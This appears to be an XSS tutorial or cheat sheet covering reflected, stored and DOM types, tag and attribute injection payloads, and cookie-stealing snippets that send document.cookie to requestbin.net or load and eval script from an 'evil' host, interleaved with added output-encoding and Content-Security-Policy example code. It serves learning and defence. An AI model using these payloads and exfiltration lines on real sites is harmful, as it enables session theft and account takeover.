Cross-Site Scripting (also known as XSS) is a vulnerability that allows an attacker to execute JavaScript code inside the victim's browser in order to gain privileged access to the victim's account or perform actions as the victim.

Types of XSS

  1. Reflected XSS - If a value you control is being reflected immediately in the web page
  2. Stored XSS - If a value you control is being saved on the server and reflected every time you visit the web page
  3. DOM XSS - If a value you control is being used by JavaScript code

Injecting raw HTML tags

If a value you control is being reflected by the site as raw HTML, you can make use of several HTML tags to execute Javascript. Some examples are:

<img src=x onerror=alert()>
<svg onload=alert()></svg>
<script>alert()</script>
<iframe src="javascript:alert()"></iframe>

If the reflected value is passed via a URL parameter, you can also make use of the onfocus event for XSS:

https://xss-game.appspot.com/level1/frame?query=<div id=x onfocus=alert() tabindex=1>#x

Injecting in HTML tag attribute

If a value you control is being reflected in an HTML tag attribute, you can try the following in order:

  1. Escape from the HTML tag to inject a new tag. Example: "><img onload=alert()>
  2. If the > character is encoded or deleted, escape from the attribute to create events, if the tag allows it. Example: " autofocus onfocus=alert() x="
    • If the tag does not allow certain events, you can try the accesskey trick. Example: " accesskey="X" onclick=alert() x="
  3. If the " character is encoded or deleted, try to exploit the attribute you control. For example, if you control the href attribute you can inject javascript:alert(), or if you control an event attribute such as onclick you can inject JavaScript directly
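Each of the reflection patterns above (raw HTML, quoted attribute, URL attribute) has a matching server-side fix: encode the value for the exact context it lands in. The following is an added defensive example, not code from the original page; the function names, the rendered page fragment and the sample inputs are constructed for illustration.

```javascript
// Added example, not from the original page: context-aware output encoding,
// the server-side fix for the reflection patterns discussed above. The
// function names, the page fragment and the sample inputs are constructed
// for illustration.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};

// Text-node context (between tags): neutralises "<" so no new tag can
// start, and the quotes so the same function is also safe inside attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Quoted-attribute context: the same escape set is sufficient ONLY when the
// template always quotes the attribute. An unquoted attribute also ends at
// whitespace, which is exactly what the ' autofocus onfocus=...' trick needs.
function escapeAttr(value) {
  return escapeHtml(value);
}

// URL-attribute context (href, src, action): escaping cannot make
// "javascript:alert()" harmless, so the scheme is allow-listed instead.
// Browsers strip leading C0 controls/spaces and embedded tab/CR/LF and
// compare the scheme case-insensitively, so normalise the same way first.
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);
function safeUrl(value) {
  const normalised = String(value)
    .replace(/^[\u0000-\u0020]+/, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(normalised);
  if (!m) return normalised;            // relative URL: no scheme to abuse
  return SAFE_SCHEMES.has(m[1].toLowerCase()) ? normalised : "about:blank";
}

// A search page that reflects the query in three different contexts.
function renderSearch(query, link) {
  return [
    `<p>Results for <b>${escapeHtml(query)}</b></p>`,
    `<input name="q" value="${escapeAttr(query)}">`,
    `<a href="${escapeAttr(safeUrl(link))}">more</a>`,
  ].join("\n");
}
```

The order in the href case matters: the scheme check runs on the raw value, and only then is the result attribute-encoded. Doing it the other way round lets an entity-encoded scheme such as `javascript&colon;` pass the check and be decoded by the HTML parser afterwards.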

Examples

These examples can be used not only when injecting raw <script> tags but also when injecting raw HTML tags with exploitable event attributes, such as onload on the <svg> tag. When placing several statements on a single line, separate them with a semicolon (;).

var cookie = btoa(document.cookie);

// XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://requestbin.net/r/ID?cookie="+cookie, true);
xhr.send();

// fetch
fetch("http://requestbin.net/r/ID?cookie="+cookie);

// fetch and eval external js
fetch('//evil/js').then(r=>r.text().then(eval));

// JS image API
(new Image()).src = "http://requestbin.net/r/ID?cookie="+cookie;

// HTML img tag
document.createElement("img").src = "http://requestbin.net/r/ID?cookie="+cookie;
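Every sink above is an outbound request, so a Content-Security-Policy that restricts connect-src, img-src and script-src to known origins blocks the exfiltration even when the injection itself succeeds. The following is an added defensive example, not code from the original page: it models the subset of CSP source matching (`'self'`, `'none'`, `*`, scheme sources, host sources with optional `*.` wildcard and port) needed to check each sink against a sample policy. The policy, the page origin and the checked URLs are constructed for illustration.

```javascript
// Added example, not from the original page: a minimal CSP source-list
// matcher used to check whether the exfiltration sinks above would be
// allowed under a sample policy. It models only the subset of CSP matching
// needed here. Policy, page origin and URLs are constructed values.

// Fallback chain browsers use when a fetch directive is absent.
const FALLBACK = {
  "connect-src": ["connect-src", "default-src"],
  "img-src": ["img-src", "default-src"],
  "script-src": ["script-src", "default-src"],
};

// Parse "default-src 'self'; img-src https://cdn.example.com" into a map.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === "https:" ? "443" : protocol === "http:" ? "80" : "";
}

// Does one source expression match the target URL for a page at pageOrigin?
function sourceMatches(source, target, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return target.origin === pageOrigin.origin;
  if (src.startsWith("'")) return false;   // other keywords do not match hosts
  if (src === "*") return target.protocol === "http:" || target.protocol === "https:";
  // Scheme source, e.g. "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return target.protocol === src;
  // Host source, e.g. "https://cdn.example.com", "*.example.com", "example.com:8443"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  const targetHost = target.hostname.toLowerCase();
  if (wildcard) {
    if (!targetHost.endsWith("." + host)) return false;
  } else if (targetHost !== host) {
    return false;
  }
  // Without an explicit scheme the page's scheme applies (http pages may also use https).
  const schemeOk = scheme
    ? target.protocol === scheme + ":"
    : target.protocol === pageOrigin.protocol ||
      (pageOrigin.protocol === "http:" && target.protocol === "https:");
  if (!schemeOk) return false;
  const targetPort = target.port || defaultPort(target.protocol);
  if (port === "*") return true;
  if (port) return targetPort === port;
  return targetPort === defaultPort(target.protocol);
}

// Would a request governed by `directive` to `url`, issued from a page at
// `pageUrl`, be allowed under `policyHeader`?
function cspAllows(policyHeader, directive, url, pageUrl) {
  const policy = parseCsp(policyHeader);
  const chain = FALLBACK[directive] || [directive, "default-src"];
  const governing = chain.find((d) => policy[d] !== undefined);
  if (!governing) return true;            // no applicable directive: unrestricted
  const target = new URL(url);
  const page = new URL(pageUrl);
  return policy[governing].some((s) => sourceMatches(s, target, page));
}

// Sample policy and page origin (constructed for this example).
const POLICY = "default-src 'self'; img-src 'self' https://cdn.example.com; script-src 'self'";
const PAGE = "https://app.example.com/account";

// Run the sinks from the text through the policy.
function demo() {
  return {
    xhrToRequestbin: cspAllows(POLICY, "connect-src", "http://requestbin.net/r/ID?cookie=abc", PAGE),
    imgToRequestbin: cspAllows(POLICY, "img-src", "http://requestbin.net/r/ID?cookie=abc", PAGE),
    imgToCdn: cspAllows(POLICY, "img-src", "https://cdn.example.com/logo.png", PAGE),
    externalScript: cspAllows(POLICY, "script-src", "https://evil.example/js", PAGE),
    sameOriginFetch: cspAllows(POLICY, "connect-src", "https://app.example.com/api", PAGE),
  };
}
```

Under this policy the XMLHttpRequest, fetch and Image sinks are all refused because connect-src and img-src resolve to `'self'` or the CDN only, and the external script fetch-and-eval is refused by script-src. Independently of CSP, marking the session cookie HttpOnly removes it from document.cookie, so the first line of the snippet above yields nothing worth sending.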

Dangling Markup

If it's not possible to create an HTML tag with an exploitable attribute to execute JavaScript code, you can try Dangling Markup.